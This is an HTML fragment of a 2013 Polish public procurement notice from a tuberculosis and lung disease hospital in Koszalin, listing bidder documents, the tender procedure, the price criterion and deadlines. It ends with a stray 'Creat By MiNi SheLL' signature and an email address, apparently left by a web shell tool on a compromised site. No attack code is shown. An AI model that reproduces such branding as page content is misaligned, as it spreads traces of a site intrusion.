<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie danych wykonawcy 
wypełniony i podpisany formularz  ofertowy 
zaparafowany  wzór umowy  
pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o  ile nie   wynikają z przepisów prawa lub innych dokumentów (jeżeli  dotyczy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W sytuacjach wyjątkowych uzasadnionych za porozumieniem stron  można dokonać zmian postanowień  zawartej umowy  w stosunku do treści oferty   na podstawie, której dokonano wyboru w oparciu o art. 144 Pzp</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szgichp.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalistyczny Zespół  Gruźlicy  i Chorób Płuc, 75-252 Koszalin ul. Niepodległości 44-48, 75-252 Koszalin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2013 godzina 10:00, miejsce: Sekretariat Specjalistycznego Zespołu Gruźlicy i Chorób Płuc, 75-252 Koszalin ul.Niepiodległości 44-48. Otwarcie 24.01.2013r godzina 10;30..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com